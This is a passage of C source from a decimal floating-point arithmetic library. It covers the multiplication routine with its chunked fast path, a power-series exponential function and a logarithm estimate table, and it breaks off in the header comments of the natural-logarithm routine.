(op==DIVIDE)) decTrim(res, set, 0, &dropped); #endif } while(0); /* end protected */ if (varalloc!=NULL) free(varalloc); /* drop any storage used */ if (allocacc!=NULL) free(allocacc); /* .. */ #if DECSUBSET if (allocrhs!=NULL) free(allocrhs); /* .. */ if (alloclhs!=NULL) free(alloclhs); /* .. */ #endif return res; } /* decDivideOp */ /* ------------------------------------------------------------------ */ /* decMultiplyOp -- multiplication operation */ /* */ /* This routine performs the multiplication C=A x B. */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X*X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* status is the usual accumulator */ /* */ /* C must have space for set->digits digits. */ /* */ /* ------------------------------------------------------------------ */ /* 'Classic' multiplication is used rather than Karatsuba, as the */ /* latter would give only a minor improvement for the short numbers */ /* expected to be handled most (and uses much more memory). */ /* */ /* There are two major paths here: the general-purpose ('old code') */ /* path which handles all DECDPUN values, and a fastpath version */ /* which is used if 64-bit ints are available, DECDPUN<=4, and more */ /* than two calls to decUnitAddSub would be made. */ /* */ /* The fastpath version lumps units together into 8-digit or 9-digit */ /* chunks, and also uses a lazy carry strategy to minimise expensive */ /* 64-bit divisions. 
The chunks are then broken apart again into */ /* units for continuing processing. Despite this overhead, the */ /* fastpath can speed up some 16-digit operations by 10x (and much */ /* more for higher-precision calculations). */ /* */ /* A buffer always has to be used for the accumulator; in the */ /* fastpath, buffers are also always needed for the chunked copies */ /* of the operand coefficients. */ /* Static buffers are larger than needed just for multiply, to allow */ /* for calls from other operations (notably exp). */ /* ------------------------------------------------------------------ */ #define FASTMUL (DECUSE64 && DECDPUN<5) static decNumber * decMultiplyOp(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set, uInt *status) { Int accunits; /* Units of accumulator in use */ Int exponent; /* work */ Int residue=0; /* rounding residue */ uByte bits; /* result sign */ Unit *acc; /* -> accumulator Unit array */ Int needbytes; /* size calculator */ void *allocacc=NULL; /* -> allocated accumulator, iff allocated */ Unit accbuff[SD2U(DECBUFFER*4+1)]; /* buffer (+1 for DECBUFFER==0, */ /* *4 for calls from other operations) */ const Unit *mer, *mermsup; /* work */ Int madlength; /* Units in multiplicand */ Int shift; /* Units to shift multiplicand by */ #if FASTMUL /* if DECDPUN is 1 or 3 work in base 10**9, otherwise */ /* (DECDPUN is 2 or 4) then work in base 10**8 */ #if DECDPUN & 1 /* odd */ #define FASTBASE 1000000000 /* base */ #define FASTDIGS 9 /* digits in base */ #define FASTLAZY 18 /* carry resolution point [1->18] */ #else #define FASTBASE 100000000 #define FASTDIGS 8 #define FASTLAZY 1844 /* carry resolution point [1->1844] */ #endif /* three buffers are used, two for chunked copies of the operands */ /* (base 10**8 or base 10**9) and one base 2**64 accumulator with */ /* lazy carry evaluation */ uInt zlhibuff[(DECBUFFER*2+1)/8+1]; /* buffer (+1 for DECBUFFER==0) */ uInt *zlhi=zlhibuff; /* -> lhs array */ uInt *alloclhi=NULL; /* -> allocated buffer, iff allocated */ uInt zrhibuff[(DECBUFFER*2+1)/8+1]; /* buffer (+1 for DECBUFFER==0) */ uInt *zrhi=zrhibuff; /* -> rhs array */ uInt *allocrhi=NULL; /* -> allocated buffer, iff allocated */ uLong zaccbuff[(DECBUFFER*2+1)/4+2]; /* buffer (+1 for DECBUFFER==0) */ /* [allocacc is shared for both paths, as only one will run] */ uLong *zacc=zaccbuff; /* -> accumulator array for exact result */ #if DECDPUN==1 Int zoff; /* accumulator offset */ #endif uInt *lip, *rip; /* item pointers */ uInt *lmsi, *rmsi; /* most significant items */ Int ilhs, irhs, iacc; /* item counts in the arrays */ Int lazy; /* lazy carry counter */ uLong lcarry; /* uLong carry */ uInt carry; /* carry (NB not uLong) */ Int count; /* work */ const Unit *cup; /* .. */ Unit *up; /* .. */ uLong *lp; /* .. */ Int p; /* ..
*/ #endif #if DECSUBSET decNumber *alloclhs=NULL; /* -> allocated buffer, iff allocated */ decNumber *allocrhs=NULL; /* -> allocated buffer, iff allocated */ #endif #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif /* precalculate result sign */ bits=(uByte)((lhs->bits^rhs->bits)&DECNEG); /* handle infinities and NaNs */ if (SPECIALARGS) { /* a special bit set */ if (SPECIALARGS & (DECSNAN | DECNAN)) { /* one or two NaNs */ decNaNs(res, lhs, rhs, set, status); return res;} /* one or two infinities; Infinity * 0 is invalid */ if (((lhs->bits & DECINF)==0 && ISZERO(lhs)) ||((rhs->bits & DECINF)==0 && ISZERO(rhs))) { *status|=DEC_Invalid_operation; return res;} decNumberZero(res); res->bits=bits|DECINF; /* infinity */ return res;} /* For best speed, as in DMSRCN [the original Rexx numerics */ /* module], use the shorter number as the multiplier (rhs) and */ /* the longer as the multiplicand (lhs) to minimise the number of */ /* adds (partial products) */ if (lhs->digits<rhs->digits) { /* swap... */ const decNumber *hold=lhs; lhs=rhs; rhs=hold; } do { /* protect allocated storage */ #if DECSUBSET if (!set->extended) { /* reduce operands and set lostDigits status, as needed */ if (lhs->digits>set->digits) { alloclhs=decRoundOperand(lhs, set, status); if (alloclhs==NULL) break; lhs=alloclhs; } if (rhs->digits>set->digits) { allocrhs=decRoundOperand(rhs, set, status); if (allocrhs==NULL) break; rhs=allocrhs; } } #endif /* [following code does not require input rounding] */ #if FASTMUL /* fastpath can be used */ /* use the fast path if there are enough digits in the shorter */ /* operand to make the setup and takedown worthwhile */ #define NEEDTWO (DECDPUN*2) /* within two decUnitAddSub calls */ if (rhs->digits>NEEDTWO) { /* use fastpath... */ /* calculate the number of elements in each array */ ilhs=(lhs->digits+FASTDIGS-1)/FASTDIGS; /* [ceiling] */ irhs=(rhs->digits+FASTDIGS-1)/FASTDIGS; /* .. */ iacc=ilhs+irhs; /* allocate buffers if required, as usual */ needbytes=ilhs*sizeof(uInt); if (needbytes>(Int)sizeof(zlhibuff)) { alloclhi=(uInt *)malloc(needbytes); zlhi=alloclhi;} needbytes=irhs*sizeof(uInt); if (needbytes>(Int)sizeof(zrhibuff)) { allocrhi=(uInt *)malloc(needbytes); zrhi=allocrhi;} /* Allocating the accumulator space needs a special case when */ /* DECDPUN=1 because when converting the accumulator to Units */ /* after the multiplication each 8-byte item becomes 9 1-byte */ /* units. Therefore iacc extra bytes are needed at the front */ /* (rounded up to a multiple of 8 bytes), and the uLong */ /* accumulator starts offset the appropriate number of units */ /* to the right to avoid overwrite during the unchunking. 
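*/
/* [Illustrative numbers, not part of the original commentary: with */
/* DECDPUN==1 and iacc=10, the ten 8-byte uLong items unchunk into */
/* up to 90 one-byte units -- 10 bytes more than the uLong array */
/* itself -- so zoff=(10+7)/8=2 extra items (16 bytes) are reserved */
/* at the front and the uLong accumulator starts two items to the */
/* right.] */
/*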
*/ needbytes=iacc*sizeof(uLong); #if DECDPUN==1 zoff=(iacc+7)/8; /* items to offset by */ needbytes+=zoff*8; #endif if (needbytes>(Int)sizeof(zaccbuff)) { allocacc=(uLong *)malloc(needbytes); zacc=(uLong *)allocacc;} if (zlhi==NULL||zrhi==NULL||zacc==NULL) { *status|=DEC_Insufficient_storage; break;} acc=(Unit *)zacc; /* -> target Unit array */ #if DECDPUN==1 zacc+=zoff; /* start uLong accumulator to right */ #endif /* assemble the chunked copies of the left and right sides */ for (count=lhs->digits, cup=lhs->lsu, lip=zlhi; count>0; lip++) for (p=0, *lip=0; p<FASTDIGS && count>0; p+=DECDPUN, cup++, count-=DECDPUN) *lip+=*cup*powers[p]; lmsi=lip-1; /* save -> msi */ for (count=rhs->digits, cup=rhs->lsu, rip=zrhi; count>0; rip++) for (p=0, *rip=0; p<FASTDIGS && count>0; p+=DECDPUN, cup++, count-=DECDPUN) *rip+=*cup*powers[p]; rmsi=rip-1; /* save -> msi */ /* zero the accumulator */ for (lp=zacc; lp<zacc+iacc; lp++) *lp=0; /* Start the multiplication */ /* Resolving carries can dominate the cost of accumulating the */ /* partial products, so this is only done when necessary. */ /* Each uLong item in the accumulator can hold values up to */ /* 2**64-1, and each partial product can be as large as */ /* (10**FASTDIGS-1)**2. When FASTDIGS=9, this can be added to */ /* itself 18.4 times in a uLong without overflowing, so during */ /* the main calculation resolution is carried out every 18th */ /* add -- every 162 digits. Similarly, when FASTDIGS=8, the */ /* partial products can be added to themselves 1844.6 times in */ /* a uLong without overflowing, so intermediate carry */ /* resolution occurs only every 14752 digits. Hence for common */ /* short numbers usually only the one final carry resolution */ /* occurs. */ /* (The count is set via FASTLAZY to simplify experiments to */ /* measure the value of this approach: a 35% improvement on a */ /* [34x34] multiply.) */ lazy=FASTLAZY; /* carry delay count */ for (rip=zrhi; rip<=rmsi; rip++) { /* over each item in rhs */ lp=zacc+(rip-zrhi); /* where to add the lhs */ for (lip=zlhi; lip<=lmsi; lip++, lp++) { /* over each item in lhs */ *lp+=(uLong)(*lip)*(*rip); /* [this should in-line] */ } /* lip loop */ lazy--; if (lazy>0 && rip!=rmsi) continue; lazy=FASTLAZY; /* reset delay count */ /* spin up the accumulator resolving overflows */ for (lp=zacc; lp<zacc+iacc; lp++) { if (*lp<FASTBASE) continue; /* it fits */ lcarry=*lp/FASTBASE; /* top part [slow divide] */ /* lcarry can exceed 2**32-1, so check again; this check */ /* and occasional extra divide (slow) is well worth it, as */ /* it allows FASTLAZY to be increased to 18 rather than 4 */ /* in the FASTDIGS=9 case */ if (lcarry<FASTBASE) carry=(uInt)lcarry; /* [usual] */ else { /* two-place carry [fairly rare] */ uInt carry2=(uInt)(lcarry/FASTBASE); /* top top part */ *(lp+2)+=carry2; /* add to item+2 */ *lp-=((uLong)FASTBASE*FASTBASE*carry2); /* [slow] */ carry=(uInt)(lcarry-((uLong)FASTBASE*carry2)); /* [inline] */ } *(lp+1)+=carry; /* add to item above [inline] */ *lp-=((uLong)FASTBASE*carry); /* [inline] */ } /* carry resolution */ } /* rip loop */ /* The multiplication is complete; time to convert back into */ /* units. This can be done in-place in the accumulator and in */ /* 32-bit operations, because carries were resolved after the */ /* final add. This needs N-1 divides and multiplies for */ /* each item in the accumulator (which will become up to N */ /* units, where 2<=N<=9). 
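*/
/* [Illustrative check of the bound, not part of the original */
/* commentary: (10**9-1)**2 = 999999998000000001, just under 1E+18, */
/* while a uLong holds 2**64-1 ~= 1.84E+19, so about 18.4 such */
/* partial products can be accumulated before resolution is forced */
/* (FASTLAZY=18, i.e., every 18*9=162 digits); with FASTDIGS=8 the */
/* quotient is about 1844.6, giving FASTLAZY=1844 and resolution */
/* every 1844*8=14752 digits. A disabled stand-alone check: */
#if 0
{
  uLong xmaxpp=(uLong)999999999*999999999; /* max FASTDIGS=9 product */
  Int xadds=(Int)((~(uLong)0)/xmaxpp); /* == 18 */
}
#endif
/*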
*/ for (lp=zacc, up=acc; lp<zacc+iacc; lp++) { uInt item=(uInt)*lp; /* decapitate to uInt */ for (p=0; p<FASTDIGS-DECDPUN; p+=DECDPUN, up++) { uInt part=item/(DECDPUNMAX+1); *up=(Unit)(item-(part*(DECDPUNMAX+1))); item=part; } /* p */ *up=(Unit)item; up++; /* [final needs no division] */ } /* lp */ accunits=up-acc; /* count of units */ } else { /* here to use units directly, without chunking ['old code'] */ #endif /* if accumulator will be too long for local storage, then allocate */ acc=accbuff; /* -> assume buffer for accumulator */ needbytes=(D2U(lhs->digits)+D2U(rhs->digits))*sizeof(Unit); if (needbytes>(Int)sizeof(accbuff)) { allocacc=(Unit *)malloc(needbytes); if (allocacc==NULL) {*status|=DEC_Insufficient_storage; break;} acc=(Unit *)allocacc; /* use the allocated space */ } /* Now the main long multiplication loop */ /* Unlike the equivalent in the IBM Java implementation, there */ /* is no advantage in calculating from msu to lsu. So, do it */ /* by the book, as it were. */ /* Each iteration calculates ACC=ACC+MULTAND*MULT */ accunits=1; /* accumulator starts at '0' */ *acc=0; /* .. (lsu=0) */ shift=0; /* no multiplicand shift at first */ madlength=D2U(lhs->digits); /* this won't change */ mermsup=rhs->lsu+D2U(rhs->digits); /* -> msu+1 of multiplier */ for (mer=rhs->lsu; mer<mermsup; mer++) { /* Here, *mer is the next Unit in the multiplier to use */ /* If non-zero [optimization] add it... */ if (*mer!=0) accunits=decUnitAddSub(&acc[shift], accunits-shift, lhs->lsu, madlength, 0, &acc[shift], *mer) + shift; else { /* extend acc with a 0; it will be used shortly */ *(acc+accunits)=0; /* [this avoids length of <=0 later] */ accunits++; } /* multiply multiplicand by 10**DECDPUN for next Unit to left */ shift++; /* add this for 'logical length' */ } /* n */ #if FASTMUL } /* unchunked units */ #endif /* common end-path */ #if DECTRACE decDumpAr('*', acc, accunits); /* Show exact result */ #endif /* acc now contains the exact result of the multiplication, */ /* possibly with a leading zero unit; build the decNumber from */ /* it, noting if any residue */ res->bits=bits; /* set sign */ res->digits=decGetDigits(acc, accunits); /* count digits exactly */ /* There can be a 31-bit wrap in calculating the exponent. */ /* This can only happen if both input exponents are negative and */ /* both their magnitudes are large. If there was a wrap, set a */ /* safe very negative exponent, from which decFinalize() will */ /* raise a hard underflow shortly. */ exponent=lhs->exponent+rhs->exponent; /* calculate exponent */ if (lhs->exponent<0 && rhs->exponent<0 && exponent>0) exponent=-2*DECNUMMAXE; /* force underflow */ res->exponent=exponent; /* OK to overwrite now */ /* Set the coefficient. If any rounding, residue records */ decSetCoeff(res, set, acc, res->digits, &residue, status); decFinish(res, set, &residue, status); /* final cleanup */ } while(0); /* end protected */ if (allocacc!=NULL) free(allocacc); /* drop any storage used */ #if DECSUBSET if (allocrhs!=NULL) free(allocrhs); /* .. */ if (alloclhs!=NULL) free(alloclhs); /* .. */ #endif #if FASTMUL if (allocrhi!=NULL) free(allocrhi); /* .. */ if (alloclhi!=NULL) free(alloclhi); /* .. */ #endif return res; } /* decMultiplyOp */ /* ------------------------------------------------------------------ */ /* decExpOp -- effect exponentiation */ /* */ /* This computes C = exp(A) */ /* */ /* res is C, the result. 
C may be A */ /* rhs is A */ /* set is the context; note that rounding mode has no effect */ /* */ /* C must have space for set->digits digits. status is updated but */ /* not set. */ /* */ /* Restrictions: */ /* */ /* digits, emax, and -emin in the context must be less than */ /* 2*DEC_MAX_MATH (1999998), and the rhs must be within these */ /* bounds or a zero. This is an internal routine, so these */ /* restrictions are contractual and not enforced. */ /* */ /* A finite result is rounded using DEC_ROUND_HALF_EVEN; it will */ /* almost always be correctly rounded, but may be up to 1 ulp in */ /* error in rare cases. */ /* */ /* Finite results will always be full precision and Inexact, except */ /* when A is a zero or -Infinity (giving 1 or 0 respectively). */ /* ------------------------------------------------------------------ */ /* The approach used here is similar to the algorithm described in */ /* */ /* Variable Precision Exponential Function, T. E. Hull and */ /* A. Abrham, ACM Transactions on Mathematical Software, Vol 12 #2, */ /* pp79-91, ACM, June 1986. */ /* */ /* with the main difference being that the iterations in the series */ /* evaluation are terminated dynamically (which does not require the */ /* extra variable-precision variables which are expensive in this */ /* context). */ /* */ /* The error analysis in Hull & Abrham's paper applies except for the */ /* round-off error accumulation during the series evaluation. This */ /* code does not precalculate the number of iterations and so cannot */ /* use Horner's scheme. Instead, the accumulation is done at double- */ /* precision, which ensures that the additions of the terms are exact */ /* and do not accumulate round-off (and any round-off errors in the */ /* terms themselves move 'to the right' faster than they can */ /* accumulate). This code also extends the calculation by allowing, */ /* in the spirit of other decNumber operators, the input to be more */ /* precise than the result (the precision used is based on the more */ /* precise of the input or requested result). */ /* */ /* Implementation notes: */ /* */ /* 1. This is separated out as decExpOp so it can be called from */ /* other Mathematical functions (notably Ln) with a wider range */ /* than normal. In particular, it can handle the slightly wider */ /* (double) range needed by Ln (which has to be able to calculate */ /* exp(-x) where x can be the tiniest number (Ntiny)). */ /* */ /* 2. Normalizing x to be <=0.1 (instead of <=1) reduces loop */ /* iterations by approximately a third with additional (although */ /* diminishing) returns as the range is reduced to even smaller */ /* fractions. However, h (the power of 10 used to correct the */ /* result at the end, see below) must be kept <=8 as otherwise */ /* the final result cannot be computed. Hence the leverage is a */ /* sliding value (8-h), where potentially the range is reduced */ /* more for smaller values. */ /* */ /* The leverage that can be applied in this way is severely */ /* limited by the cost of the raise-to-the-power at the end, */ /* which dominates when the number of iterations is small (less */ /* than ten) or when rhs is short. As an example, the adjustment */ /* x**10,000,000 needs 31 multiplications, all but one full-width. */ /* */ /* 3. The restrictions (especially precision) could be raised with */ /* care, but the full decNumber range seems very hard within the */ /* 32-bit limits. */ /* */ /* 4.
The working precisions for the static buffers are twice the */ /* obvious size to allow for calls from decNumberPower. */ /* ------------------------------------------------------------------ */ static decNumber *decExpOp(decNumber *res, const decNumber *rhs, decContext *set, uInt *status) { uInt ignore=0; /* working status */ Int h; /* adjusted exponent for 0.xxxx */ Int p; /* working precision */ Int residue; /* rounding residue */ uInt needbytes; /* for space calculations */ const decNumber *x=rhs; /* (may point to safe copy later) */ decContext aset, tset, dset; /* working contexts */ Int comp; /* work */ /* the argument is often copied to normalize it, so (unusually) it */ /* is treated like other buffers, using DECBUFFER, +1 in case */ /* DECBUFFER is 0 */ decNumber bufr[D2N(DECBUFFER*2+1)]; decNumber *allocrhs=NULL; /* non-NULL if rhs buffer allocated */ /* the working precision will be no more than set->digits+8+1 */ /* so for on-stack buffers DECBUFFER+9 is used, +1 in case DECBUFFER */ /* is 0 (and twice that for the accumulator) */ /* buffer for t, term (working precision plus) */ decNumber buft[D2N(DECBUFFER*2+9+1)]; decNumber *allocbuft=NULL; /* -> allocated buft, iff allocated */ decNumber *t=buft; /* term */ /* buffer for a, accumulator (working precision * 2), at least 9 */ decNumber bufa[D2N(DECBUFFER*4+18+1)]; decNumber *allocbufa=NULL; /* -> allocated bufa, iff allocated */ decNumber *a=bufa; /* accumulator */ /* decNumber for the divisor term; this needs at most 9 digits */ /* and so can be fixed size [16 so can use standard context] */ decNumber bufd[D2N(16)]; decNumber *d=bufd; /* divisor */ decNumber numone; /* constant 1 */ #if DECCHECK Int iterations=0; /* for later sanity check */ if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif do { /* protect allocated storage */ if (SPECIALARG) { /* handle infinities and NaNs */ if (decNumberIsInfinite(rhs)) { /* an infinity */ if (decNumberIsNegative(rhs)) /* -Infinity -> +0 */ decNumberZero(res); else decNumberCopy(res, rhs); /* +Infinity -> self */ } else decNaNs(res, rhs, NULL, set, status); /* a NaN */ break;} if (ISZERO(rhs)) { /* zeros -> exact 1 */ decNumberZero(res); /* make clean 1 */ *res->lsu=1; /* .. */ break;} /* [no status to set] */ /* e**x when 0 < x < 0.66 is < 1+3x/2, hence can fast-path */ /* positive and negative tiny cases which will result in inexact */ /* 1. This also allows the later add-accumulate to always be */ /* exact (because its length will never be more than twice the */ /* working precision). */ /* The comparator (tiny) needs just one digit, so use the */ /* decNumber d for it (reused as the divisor, etc., below); its */ /* exponent is such that if x is positive it will have */ /* set->digits-1 zeros between the decimal point and the digit, */ /* which is 4, and if x is negative one more zero there as the */ /* more precise result will be of the form 0.9999999 rather than */ /* 1.0000001. Hence, tiny will be 0.0000004 if digits=7 and x>0 */ /* or 0.00000004 if digits=7 and x<0. If RHS not larger than */ /* this then the result will be 1.000000 */ decNumberZero(d); /* clean */ *d->lsu=4; /* set 4 .. */ d->exponent=-set->digits; /* * 10**(-d) */ if (decNumberIsNegative(rhs)) d->exponent--; /* negative case */ comp=decCompare(d, rhs, 1); /* signless compare */ if (comp==BADINT) { *status|=DEC_Insufficient_storage; break;} if (comp>=0) { /* rhs < d */ Int shift=set->digits-1; decNumberZero(res); /* set 1 */ *res->lsu=1; /* .. 
*/ res->digits=decShiftToMost(res->lsu, 1, shift); res->exponent=-shift; /* make 1.0000... */ *status|=DEC_Inexact | DEC_Rounded; /* .. inexactly */ break;} /* tiny */ /* set up the context to be used for calculating a, as this is */ /* used on both paths below */ decContextDefault(&aset, DEC_INIT_DECIMAL64); /* accumulator bounds are as requested (could underflow) */ aset.emax=set->emax; /* usual bounds */ aset.emin=set->emin; /* .. */ aset.clamp=0; /* and no concrete format */ /* calculate the adjusted (Hull & Abrham) exponent (where the */ /* decimal point is just to the left of the coefficient msd) */ h=rhs->exponent+rhs->digits; /* if h>8 then 10**h cannot be calculated safely; however, when */ /* h=8 then exp(|rhs|) will be at least exp(1E+7) which is at */ /* least 6.59E+4342944, so (due to the restriction on Emax/Emin) */ /* overflow (or underflow to 0) is guaranteed -- so this case can */ /* be handled by simply forcing the appropriate excess */ if (h>8) { /* overflow/underflow */ /* set up here so Power call below will over or underflow to */ /* zero; set accumulator to either 2 or 0.02 */ /* [stack buffer for a is always big enough for this] */ decNumberZero(a); *a->lsu=2; /* not 1 but < exp(1) */ if (decNumberIsNegative(rhs)) a->exponent=-2; /* make 0.02 */ h=8; /* clamp so 10**h computable */ p=9; /* set a working precision */ } else { /* h<=8 */ Int maxlever=(rhs->digits>8?1:0); /* [could/should increase this for precisions >40 or so, too] */ /* if h is 8, cannot normalize to a lower upper limit because */ /* the final result will not be computable (see notes above), */ /* but leverage can be applied whenever h is less than 8. */ /* Apply as much as possible, up to a MAXLEVER digits, which */ /* sets the tradeoff against the cost of the later a**(10**h). */ /* As h is increased, the working precision below also */ /* increases to compensate for the "constant digits at the */ /* front" effect. */ Int lever=MINI(8-h, maxlever); /* leverage attainable */ Int use=-rhs->digits-lever; /* exponent to use for RHS */ h+=lever; /* apply leverage selected */ if (h<0) { /* clamp */ use+=h; /* [may end up subnormal] */ h=0; } /* Take a copy of RHS if it needs normalization (true whenever x>=1) */ if (rhs->exponent!=use) { decNumber *newrhs=bufr; /* assume will fit on stack */ needbytes=sizeof(decNumber)+(D2U(rhs->digits)-1)*sizeof(Unit); if (needbytes>sizeof(bufr)) { /* need malloc space */ allocrhs=(decNumber *)malloc(needbytes); if (allocrhs==NULL) { /* hopeless -- abandon */ *status|=DEC_Insufficient_storage; break;} newrhs=allocrhs; /* use the allocated space */ } decNumberCopy(newrhs, rhs); /* copy to safe space */ newrhs->exponent=use; /* normalize; now <1 */ x=newrhs; /* ready for use */ /* decNumberShow(x); */ } /* Now use the usual power series to evaluate exp(x). The */ /* series starts as 1 + x + x^2/2 ... so prime ready for the */ /* third term by setting the term variable t=x, the accumulator */ /* a=1, and the divisor d=2. */ /* First determine the working precision. From Hull & Abrham */ /* this is set->digits+h+2. 
However, if x is 'over-precise' we */ /* need to allow for all its digits to potentially participate */ /* (consider an x where all the excess digits are 9s) so in */ /* this case use x->digits+h+2 */ p=MAXI(x->digits, set->digits)+h+2; /* [h<=8] */ /* a and t are variable precision, and depend on p, so space */ /* must be allocated for them if necessary */ /* the accumulator needs to be able to hold 2p digits so that */ /* the additions on the second and subsequent iterations are */ /* sufficiently exact. */ needbytes=sizeof(decNumber)+(D2U(p*2)-1)*sizeof(Unit); if (needbytes>sizeof(bufa)) { /* need malloc space */ allocbufa=(decNumber *)malloc(needbytes); if (allocbufa==NULL) { /* hopeless -- abandon */ *status|=DEC_Insufficient_storage; break;} a=allocbufa; /* use the allocated space */ } /* the term needs to be able to hold p digits (which is */ /* guaranteed to be larger than x->digits, so the initial copy */ /* is safe); it may also be used for the raise-to-power */ /* calculation below, which needs an extra two digits */ needbytes=sizeof(decNumber)+(D2U(p+2)-1)*sizeof(Unit); if (needbytes>sizeof(buft)) { /* need malloc space */ allocbuft=(decNumber *)malloc(needbytes); if (allocbuft==NULL) { /* hopeless -- abandon */ *status|=DEC_Insufficient_storage; break;} t=allocbuft; /* use the allocated space */ } decNumberCopy(t, x); /* term=x */ decNumberZero(a); *a->lsu=1; /* accumulator=1 */ decNumberZero(d); *d->lsu=2; /* divisor=2 */ decNumberZero(&numone); *numone.lsu=1; /* constant 1 for increment */ /* set up the contexts for calculating a, t, and d */ decContextDefault(&tset, DEC_INIT_DECIMAL64); dset=tset; /* accumulator bounds are set above, set precision now */ aset.digits=p*2; /* double */ /* term bounds avoid any underflow or overflow */ tset.digits=p; tset.emin=DEC_MIN_EMIN; /* [emax is plenty] */ /* [dset.digits=16, etc., are sufficient] */ /* finally ready to roll */ for (;;) { #if DECCHECK iterations++; #endif /* only the status from the accumulation is interesting */ /* [but it should remain unchanged after first add] */ decAddOp(a, a, t, &aset, 0, status); /* a=a+t */ decMultiplyOp(t, t, x, &tset, &ignore); /* t=t*x */ decDivideOp(t, t, d, &tset, DIVIDE, &ignore); /* t=t/d */ /* the iteration ends when the term cannot affect the result, */ /* if rounded to p digits, which is when its value is smaller */ /* than the accumulator by p+1 digits. There must also be */ /* full precision in a. */ if (((a->digits+a->exponent)>=(t->digits+t->exponent+p+1)) && (a->digits>=p)) break; decAddOp(d, d, &numone, &dset, 0, &ignore); /* d=d+1 */ } /* iterate */ #if DECCHECK /* just a sanity check; comment out test to show always */ if (iterations>p+3) printf("Exp iterations=%ld, status=%08lx, p=%ld, d=%ld\n", iterations, *status, p, x->digits); #endif } /* h<=8 */ /* apply postconditioning: a=a**(10**h) -- this is calculated */ /* at a slightly higher precision than Hull & Abrham suggest */ if (h>0) { Int seenbit=0; /* set once a 1-bit is seen */ Int i; /* counter */ Int n=powers[h]; /* always positive */ aset.digits=p+2; /* sufficient precision */ /* avoid the overhead and many extra digits of decNumberPower */ /* as all that is needed is the short 'multipliers' loop; here */ /* accumulate the answer into t */ decNumberZero(t); *t->lsu=1; /* acc=1 */ for (i=1;;i++){ /* for each bit [top bit ignored] */ /* abandon if have had overflow or terminal underflow */ if (*status & (DEC_Overflow|DEC_Underflow)) { /* interesting? 
*/ if (*status&DEC_Overflow || ISZERO(t)) break;} n=n<<1; /* move next bit to testable position */ if (n<0) { /* top bit is set */ seenbit=1; /* OK, have a significant bit */ decMultiplyOp(t, t, a, &aset, status); /* acc=acc*x */ } if (i==31) break; /* that was the last bit */ if (!seenbit) continue; /* no need to square 1 */ decMultiplyOp(t, t, t, &aset, status); /* acc=acc*acc [square] */ } /*i*/ /* 32 bits */ /* decNumberShow(t); */ a=t; /* and carry on using t instead of a */ } /* Copy and round the result to res */ residue=1; /* indicate dirt to right .. */ if (ISZERO(a)) residue=0; /* .. unless underflowed to 0 */ aset.digits=set->digits; /* [use default rounding] */ decCopyFit(res, a, &aset, &residue, status); /* copy & shorten */ decFinish(res, set, &residue, status); /* cleanup/set flags */ } while(0); /* end protected */ if (allocrhs !=NULL) free(allocrhs); /* drop any storage used */ if (allocbufa!=NULL) free(allocbufa); /* .. */ if (allocbuft!=NULL) free(allocbuft); /* .. */ /* [status is handled by caller] */ return res; } /* decExpOp */ /* ------------------------------------------------------------------ */ /* Initial-estimate natural logarithm table */ /* */ /* LNnn -- 90-entry 16-bit table for values from .10 through .99. */ /* The result is a 4-digit encode of the coefficient (c=the */ /* top 14 bits encoding 0-9999) and a 2-digit encode of the */ /* exponent (e=the bottom 2 bits encoding 0-3) */ /* */ /* The resulting value is given by: */ /* */ /* v = -c * 10**(-e-3) */ /* */ /* where e and c are extracted from entry k = LNnn[x-10] */ /* where x is truncated (NB) into the range 10 through 99, */ /* and then c = k>>2 and e = k&3. */ /* ------------------------------------------------------------------ */ static const uShort LNnn[90] = { 9016, 8652, 8316, 8008, 7724, 7456, 7208, 6972, 6748, 6540, 6340, 6148, 5968, 5792, 5628, 5464, 5312, 5164, 5020, 4884, 4748, 4620, 4496, 4376, 4256, 4144, 4032, 39233, 38181, 37157, 36157, 35181, 34229, 33297, 32389, 31501, 30629, 29777, 28945, 28129, 27329, 26545, 25777, 25021, 24281, 23553, 22837, 22137, 21445, 20769, 20101, 19445, 18801, 18165, 17541, 16925, 16321, 15721, 15133, 14553, 13985, 13421, 12865, 12317, 11777, 11241, 10717, 10197, 9685, 9177, 8677, 8185, 7697, 7213, 6737, 6269, 5801, 5341, 4889, 4437, 39930, 35534, 31186, 26886, 22630, 18418, 14254, 10130, 6046, 20055}; /* ------------------------------------------------------------------ */ /* decLnOp -- effect natural logarithm */ /* */ /* This computes C = ln(A) */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context; note that rounding mode has no effect */ /* */ /* C must have space for set->digits digits. */ /* */ /* Notable cases: */ /* A<0 -> Invalid */ /* A=0 -> -Infinity (Exact) */ /* A=+Infinity -> +Infinity (Exact) */ /* A=1 exactly -> 0 (Exact) */ /* */ /* Restrictions (as for Exp): */ /* */ /* digits, emax, and -emin in the context must be less than */ /* DEC_MAX_MATH+11 (1000010), and the rhs must be within these */ /* bounds or a zero. This is an internal routine, so these */ /* restrictions are contractual and not enforced. */ /* */ /* A finite result is rounded using DEC_ROUND_HALF_EVEN; it will */ /* almost always be correctly rounded, but may be up to 1 ulp in */ /* error in rare cases. */ /* ------------------------------------------------------------------ */ /* The result is calculated using Newton's method, with each */ /* iteration calculating a' = a + x * exp(-a) - 1. See, for example, */ /* Epperson 1989. 
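*/
/* [Illustrative step, not part of the original commentary: for x=2 */
/* with the table-based estimate a=0.6931, the adjustment */
/* x*exp(-a)-1 evaluates to about 0.0000472, giving the next */
/* estimate a' ~= 0.6931472; the number of correct digits roughly */
/* doubles on each iteration, as usual for Newton's method.] */
/*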
*/ /* */ /* The iteration ends when the adjustment x*exp(-a)-1 is tiny enough. */ /* This has to be calculated at the sum of the precision of x and the */ /* working precision. */ /* */ /* Implementation notes: */ /* */ /* 1. This is separated out as decLnOp so it can be called from */ /* other Mathematical functions (e.g., Log 10) with a wider range */ /* than normal. In particular, it can handle the slightly wider */ /* (+9+2) range needed by a power function. */ /* */ /* 2. The speed of this function is about 10x slower than exp, as */ /* it typically needs 4-6 iterations for short numbers, and the */ /* extra precision needed adds a squaring effect, twice. */ /* */ /* 3. Fastpaths are included for ln(10) and ln(2), up to length 40, */ /* as these are common requests. ln(10) is used by log10(x). */ /* */ /* 4. An iteration might be saved by widening the LNnn table, and */ /* would certainly save at least one if it were made ten times */ /* bigger, too (for truncated fractions 0.100 through 0.999). */ /* However, for most practical evaluations, at least four or five */ /* iterations will be needed -- so this would only speed up by */ /* 20-25% and that probably does not justify 